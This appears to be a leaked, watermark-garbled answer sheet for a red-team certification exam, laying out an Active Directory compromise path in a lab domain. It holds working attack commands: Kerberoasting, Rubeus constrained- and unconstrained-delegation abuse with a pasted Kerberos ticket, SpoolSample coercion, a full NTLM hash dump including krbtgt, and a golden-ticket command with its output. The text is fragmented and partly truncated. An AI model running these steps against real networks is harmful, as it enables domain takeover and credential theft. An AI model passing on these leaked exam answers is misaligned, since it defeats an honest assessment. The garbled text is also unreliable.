Old Crto 2
Old Crto 2
Old Crto 2
AttackPath:
ed
ak
Le
ed
ak
using CS)
If using covenant https://luemmelsec.github.io/Circumventing-Countermeasures-In-AD/
Open ur beacon to get a shell back. To get system u need to follow course material always install
elevated and change it to lapsx64.msi as per the app locker policy and place in task.
ed
Run bloodhound
asperoast jjames and atorres and crack them
ak
Le
Leaked
Le
ed
ak
Le
ed
Impersonate ofisher with contrained delegation
ak
UFMuTE9DQUyiKzApoAMCAQKhIjAgGwZrcmJ0Z3QbFkNISUxELlJFRFRFQU1PUFMuTE9DQUyjggPvMII
D66ADAgESoQMCAQKiggPdBIID2baP41WgentW8su9Hevgb/J4Mygq32wmOqQ7f4N9Kx4WaVRS5D8
Mc3vQ7R/XO3ARAY7RV1MyBg7CQENMK87Wfgejad2a0bYXyHu1moCDjYHjNMJO3n4zOZ7FkDPEDOy
RJPgUae1EO9vsipYJjz2/PhBeq2+x6sAFtv7eFIUzzgJeWFyNj5FI/8QWfHwczI08nGDVwHK6rILbNp0e/6T
ychIBtHROnBccvOapIiitWWN4j6Ra5YokuFCp7ZBlX2LQhKSjTnM2/ik9fyMW21RuP6bU6VmSZDNTBRA
QNDoAlwFRR8aE/2LmQ8Mjyj7mCgd7z3jtjdJHaaUqLLkRb2kBzf6QPsnG7KgaWUri+hwk7zrLzFzMHAJN
ed
qy9Y98b31cmUMwj/25lHsPX0WoB4Plb29Rja6GtSzEQ5Y+Tj6VpTXL9DpKJke1hMQc+T44rdEG35ACrZ
NL3Y7A+E3tNhhcFP/xmqXtWqlz6Iar2A5eMw1QXO5qtj670U1KvmSY/rS8gxS9ey/pApYlXZASbaq8Mhy
HsqF9RKy4H+96Y+kTQvma9sN2KaLVHfeUp9BULFCdzFJY3A6QPjI+gOaYacMqvcdkUINrquNLXMuAZHk
2cME43Y4VytTTX8XApVBnIhEVGNb8fPaarXOzO4UNlFi4bpuWKGfOtthLCYZMU/hu02V5JqskJG907kPn
ak
OED40klDpi4izgCaJK5vJ44/Qh0D8njjr4TN6EpbpcfrVmokCX1muUU8zlEHy6XglP1OkQH+29OZV9U/7V/
xq5+tdTPfOC4YrkYVZxBR/N2wPXYzKjK1q7Fx3AVigU45xiwBbSt1pEcp/lmyw8iN1nVDPWmV4kV+wS/b
+jj3oTOH1s/EVhDjNI567gL7U9GkZ7I59Ch/FvzKDpMzRrYmn0RB1B6QpAEr7r0P9aGXmd1M21SEVkJgC
Le
TM7aYvCLeCq5Eh2NtWJRct6Qz27WIZZ4K5g5RPHs/ZQr5UPgTCh1taPAdV9wmFcoUDy+tGgVSb+S+Vi2
qp6R3pIJomqTzjyUTbilqCh0OZT6Nk8H2N5Sf4e49apyD1SJsdf7qHXg6TPyD6YVZzL7j3WSzRbOV2wrHx
TRO+fug2yx2ZO6GZga4PdDmda5Lpq+BNZFX+ADZ/hxtMJpIv6tVbTEK02eJUApow/Q1k30Jnmv+hM0q
r/bKrqvlcQnRUtuEQd/phdNIgVSjjIcH+V0WGFkvUiH0Mrlh3msx1ndnzD97GPkb7puXTNxYoEwT4Y7VR
eUJSjZ2Z8ia/n3vP5aCkJgTBa9pOEpk9O7d8bLNTSp4sRgkiQpuMWCjggECMIH/oAMCAQCigfcEgfR9gfE
wge6ggeswgegwgeWgKzApoAMCARKhIgQgepHAZAV9TuCTEZnPcjMLIKALQhUXreRqmQh2OhBNkzuh
GBsWQ0hJTEQuUkVEVEVBTU9QUy5MT0NBTKITMBGgAwIBAaEKMAgbBlNSVi0xJKMHAwUAYKEAAKU
RGA8yMDIxMDEzMTAzMzAwN1qmERgPMjAyMTAxMzExMzMwMDdapxEYDzIwMjEwMjA1MTIzNTM
Leaked
2WqgYGxZDSElMRC5SRURURUFNT1BTLkxPQ0FMqSswKaADAgECoSIwIBsGa3JidGd0GxZDSElMRC5SR
URURUFNT1BTLkxPQ0FM
/impersonateuser:Administrator /msdsspn:time/srv-2.child.redteamops.local /altservice:cifs,host
/ptt
ed
ak
Le
ed
Do uncontrained delegation on srv-2 to reach dc-2
.\Rubeus.exe monitor /interval:1 (run this on the computer with unconstrained delegation)
Then on another window: .\SpoolSample.exe targetMachine.dc.local currentMachine.local
ak
ed
ak
Le
ed
Rubeus.exe ptt /ticket:<<paste the above ticket here>>
Jump to dc-2
ak
Le
ed
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c97d17a1aa433f4706143eaf9509fa99:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6ad171448618690dde2c67f72b85a5ea:::
ak
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:
::
ZPS-
94107178:2101:aad3b435b51404eeaad3b435b51404ee:37dd0e1e8fb505d2e5baaf4a27d2ddbd:::
Le
atorres:2102:aad3b435b51404eeaad3b435b51404ee:f442e0cc228d1a0cb4621ebce433bcdc:::
jjames:2103:aad3b435b51404eeaad3b435b51404ee:59fc0f884922b4ce376051134c71e22c:::
ofisher:2104:aad3b435b51404eeaad3b435b51404ee:0b51e7394c48a3cd6213e2d2e3dceb54:::
DC-2$:1000:aad3b435b51404eeaad3b435b51404ee:684762dd74088932d08c4291f3d6b10f:::
WKSTN-6$:1104:aad3b435b51404eeaad3b435b51404ee:5a28fee9c547fa6f75439d7aec8e123d:::
WKSTN-5$:1105:aad3b435b51404eeaad3b435b51404ee:4503ec7275fa9b51cc611696fef60f82:::
WKSTN-4$:1106:aad3b435b51404eeaad3b435b51404ee:b4ffef5d5c26fedba82d08e4611b72bd:::
WKSTN-3$:1107:aad3b435b51404eeaad3b435b51404ee:1bd6c35d565146c567d4c6de7cd67807:::
Leaked
SRV-1$:1109:aad3b435b51404eeaad3b435b51404ee:877781f8fa251a5801dee79ef8ee1074:::
SRV-2$:1110:aad3b435b51404eeaad3b435b51404ee:b2aadbe584c0f2c0d2a56237e8f1fd73:::
RTO$:1103:aad3b435b51404eeaad3b435b51404ee:e84d40ca65ccac1f8c19237653a9db3f:::
ed
2453654091-64307236-1669735849 /krbtgt:6ad171448618690dde2c67f72b85a5ea /sids:S-1-5-21-
2453654091-64307236-1669735849-519 /user:administrator /ptt command
[+] host called home, sent: 706122 bytes
[+] received output:
ak
User : administrator
Domain : child.redteamops.local (CHILD)
SID : S-1-5-21-2453654091-64307236-1669735849
User Id : 500
Le
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-2453654091-64307236-1669735849-519 ;
ServiceKey: 6ad171448618690dde2c67f72b85a5ea - rc4_hmac_nt
Lifetime :
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Le
Golden ticket for 'administrator @ child.redteamops.local' successfully submitted for current session
ed
ak
Le
Leaked
Le
ak
ed
Le
ak
ed
Le
ak
ed